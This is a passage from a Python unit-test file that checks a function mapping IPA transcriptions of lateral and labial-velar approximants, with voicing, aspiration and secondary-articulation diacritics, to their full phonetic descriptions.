def test_ɭʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰʷ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰʲ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰˠ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant
def test_ɭʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰˤ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊_is_the_representation_of_the_voiceless_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊")
self.assertEqual(actual, expected)
def test_ʎ̥_is_the_representation_of_the_voiceless_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥")
self.assertEqual(actual, expected)
# voiceless labialized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʷ")
self.assertEqual(actual, expected)
def test_ʎ̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʲ")
self.assertEqual(actual, expected)
def test_ʎ̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ˠ")
self.assertEqual(actual, expected)
def test_ʎ̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ˤ")
self.assertEqual(actual, expected)
def test_ʎ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced palatal lateral approximant pulmonic egressive consonant
def test_ʎ_is_the_representation_of_the_voiced_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ")
self.assertEqual(actual, expected)
# voiced labialized palatal lateral approximant pulmonic egressive consonant
def test_ʎʷ_is_the_representation_of_the_voiced_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʷ")
self.assertEqual(actual, expected)
# voiced palatalized palatal lateral approximant pulmonic egressive consonant
def test_ʎʲ_is_the_representation_of_the_voiced_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʲ")
self.assertEqual(actual, expected)
# voiced velarized palatal lateral approximant pulmonic egressive consonant
def test_ʎˠ_is_the_representation_of_the_voiced_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized palatal lateral approximant pulmonic egressive consonant
def test_ʎˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎˤ")
self.assertEqual(actual, expected)
# voiced aspirated palatal lateral approximant pulmonic egressive consonant
def test_ʎʰ_is_the_representation_of_the_voiced_aspirated_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized palatal lateral approximant pulmonic egressive consonant
def test_ʎʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰʷ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized palatal lateral approximant pulmonic egressive consonant
def test_ʎʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰʲ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized palatal lateral approximant pulmonic egressive consonant
def test_ʎʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰˠ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant
def test_ʎʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰˤ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless velar lateral approximant pulmonic egressive consonant
def test_ʟ̊_is_the_representation_of_the_voiceless_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊")
self.assertEqual(actual, expected)
def test_ʟ̥_is_the_representation_of_the_voiceless_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥")
self.assertEqual(actual, expected)
# voiceless labialized velar lateral approximant pulmonic egressive consonant
def test_ʟ̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʷ")
self.assertEqual(actual, expected)
def test_ʟ̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized velar lateral approximant pulmonic egressive consonant
def test_ʟ̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʲ")
self.assertEqual(actual, expected)
def test_ʟ̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized velar lateral approximant pulmonic egressive consonant
def test_ʟ̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ˠ")
self.assertEqual(actual, expected)
def test_ʟ̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized velar lateral approximant pulmonic egressive consonant
def test_ʟ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ˤ")
self.assertEqual(actual, expected)
def test_ʟ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰ_is_the_representation_of_the_voiceless_aspirated_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰ_is_the_representation_of_the_voiceless_aspirated_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced velar lateral approximant pulmonic egressive consonant
def test_ʟ_is_the_representation_of_the_voiced_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ")
self.assertEqual(actual, expected)
# voiced labialized velar lateral approximant pulmonic egressive consonant
def test_ʟʷ_is_the_representation_of_the_voiced_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʷ")
self.assertEqual(actual, expected)
# voiced palatalized velar lateral approximant pulmonic egressive consonant
def test_ʟʲ_is_the_representation_of_the_voiced_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʲ")
self.assertEqual(actual, expected)
# voiced velarized velar lateral approximant pulmonic egressive consonant
def test_ʟˠ_is_the_representation_of_the_voiced_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized velar lateral approximant pulmonic egressive consonant
def test_ʟˤ_is_the_representation_of_the_voiced_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟˤ")
self.assertEqual(actual, expected)
# voiced aspirated velar lateral approximant pulmonic egressive consonant
def test_ʟʰ_is_the_representation_of_the_voiced_aspirated_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized velar lateral approximant pulmonic egressive consonant
def test_ʟʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰʷ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized velar lateral approximant pulmonic egressive consonant
def test_ʟʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰʲ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized velar lateral approximant pulmonic egressive consonant
def test_ʟʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰˠ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized velar lateral approximant pulmonic egressive consonant
def test_ʟʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰˤ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless labial-velar approximant pulmonic egressive consonant
def test_ẘ_is_the_representation_of_the_voiceless_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘ")
self.assertEqual(actual, expected)
def test_w̥_is_the_representation_of_the_voiceless_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥")
self.assertEqual(actual, expected)
# voiceless labialized labial-velar approximant pulmonic egressive consonant
def test_ẘʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʷ")
self.assertEqual(actual, expected)
def test_w̥ʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labial-velar approximant pulmonic egressive consonant
def test_ẘʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʲ")
self.assertEqual(actual, expected)
def test_w̥ʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labial-velar approximant pulmonic egressive consonant
def test_ẘˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘˠ")
self.assertEqual(actual, expected)
def test_w̥ˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labial-velar approximant pulmonic egressive consonant
def test_ẘˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘˤ")
self.assertEqual(actual, expected)
def test_w̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labial-velar approximant pulmonic egressive consonant
def test_w̥ʰ_is_the_representation_of_the_voiceless_aspirated_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰ")
self.assertEqual(actual, expected)
def test_ẘʰ_is_the_representation_of_the_voiceless_aspirated_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labial-velar approximant pulmonic egressive consonant
def test_w̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰʷ")
self.assertEqual(actual, expected)
def test_ẘʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labial-velar approximant pulmonic egressive consonant
def test_w̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰʲ")
self.assertEqual(actual, expected)
def test_ẘʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labial-velar approximant pulmonic egressive consonant
def test_w̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰˠ")
self.assertEqual(actual, expected)
def test_ẘʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labial-velar approximant pulmonic egressive consonant
def test_w̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰˤ")
self.assertEqual(actual, expected)
def test_ẘʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰˤ")
self.assertEqual(actual, expected)
# voiced labial-velar approximant pulmonic egressive consonant
def test_w_is_the_representation_of_the_voiced_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w")
self.assertEqual(actual, expected)
# voiced labialized labial-velar approximant pulmonic egressive consonant
